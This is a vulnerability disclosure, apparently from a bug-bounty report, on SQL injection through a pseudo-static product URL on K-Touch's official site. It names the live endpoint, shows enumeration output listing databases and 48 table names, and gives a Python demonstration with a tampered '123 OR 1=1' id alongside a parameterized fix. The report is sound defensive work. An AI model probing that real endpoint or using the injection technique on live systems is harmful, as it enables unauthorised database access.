K-Touch (天宇) mobile phone official site: SQL injection via pseudo-static URL

Test URL: http://www.k-touch.cn/product/condetail/prod_id/123.html


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [5]:
[*] donglonghai
[*] information_schema
[*] mysql
[*] qiangguo
[*] renshe

current database:    'renshe'


Database: renshe
[48 tables]
+-------------------+
| yan_access        |
| yan_ad            |
| yan_admin         |
| yan_announce      |
| yan_answer        |
| yan_baoming       |
| yan_bjcx          |
| yan_bs            |
| yan_bscategory    |
| yan_bszn          |
| yan_bszncategory  |
| yan_case          |
| yan_casecategory  |
| yan_category      |
| yan_city          |
| yan_cx            |
| yan_cxcategory    |
| yan_downcategory  |
| yan_download      |
| yan_gk            |
| yan_gkcategory    |
| yan_goodscategory |
| yan_guanggao      |
| yan_hdjl          |
| yan_jgxx          |
| yan_jianli        |
| yan_link          |
| yan_member        |
| yan_msg           |
| yan_news          |
| yan_node          |
| yan_one           |
| yan_onecategory   |
| yan_page          |
| yan_province      |
| yan_role          |
| yan_role_user     |
| yan_sound         |
| yan_special       |
| yan_ticket        |
| yan_toupiao       |
| yan_type          |
| yan_user          |
| yan_xwzx          |
| yan_xwzxcategory  |
| yan_zcfg          |
| yan_zxtype        |
| yan_zxzx          |
+-------------------+

There are many sensitive tables. I tested this yesterday and did not dump any data.

Fix:

Filter the input.
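As an added example (not code from the original report or from the site), the following shows the defect class behind the finding and the fix the report asks for. The pseudo-static route /product/condetail/prod_id/123.html hands the prod_id segment to the database; the vulnerable handler splices it into the SQL text, while the hardened handler whitelists it as a bounded decimal integer and binds it as a query parameter. The in-memory sqlite3 database, the product table and its rows are constructed stand-ins for the site's MySQL back end; nothing here is taken from the report.

```python
import re
import sqlite3

# Route pattern for the pseudo-static URL in the report
# (/product/condetail/prod_id/<value>.html). Everything between
# "prod_id/" and ".html" is attacker-controlled input.
ROUTE = re.compile(r"^/product/condetail/prod_id/(?P<prod_id>[^/]*)\.html$")

# Whitelist for the id segment: decimal digits only, bounded length.
PROD_ID = re.compile(r"^[0-9]{1,10}$")


def make_db():
    """Constructed in-memory stand-in for the site's MySQL back end.
    The table name, columns and rows are assumptions, not from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (prod_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?)",
        [(123, "product-123"), (124, "product-124"), (125, "product-125")],
    )
    return conn


def route_segment(path):
    """Pull the raw prod_id segment out of the pseudo-static path."""
    m = ROUTE.match(path)
    if m is None:
        raise ValueError("path does not match the product route")
    return m.group("prod_id")


def lookup_vulnerable(conn, path):
    """The defect the report describes: the URL segment is concatenated
    into the SQL text, so any SQL syntax inside it is executed."""
    seg = route_segment(path)
    sql = "SELECT name FROM product WHERE prod_id = " + seg
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, path):
    """Fix: reject anything that is not a plain integer, then bind the
    value as a parameter so the database never parses it as SQL."""
    seg = route_segment(path)
    if not PROD_ID.match(seg):
        raise ValueError("prod_id must be a decimal integer")
    sql = "SELECT name FROM product WHERE prod_id = ?"
    return [row[0] for row in conn.execute(sql, (int(seg),))]


if __name__ == "__main__":
    db = make_db()
    good = "/product/condetail/prod_id/123.html"
    # A segment that is not a bare integer; the vulnerable handler lets
    # it change the WHERE clause, the hardened one refuses it.
    bad = "/product/condetail/prod_id/123 OR 1=1.html"
    print("vulnerable, normal id:", lookup_vulnerable(db, good))
    print("vulnerable, tampered id:", lookup_vulnerable(db, bad))
    print("hardened, normal id:", lookup_hardened(db, good))
    try:
        lookup_hardened(db, bad)
    except ValueError as e:
        print("hardened, tampered id rejected:", e)
```

On the actual ASP.NET / MySQL stack the same two steps apply: validate the route value as an integer before it reaches data access, and pass it through a bound parameter (for example via MySqlCommand.Parameters with MySQL Connector/NET) rather than building the statement with string concatenation. Rewriting the URL to look static does nothing for the query behind it.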
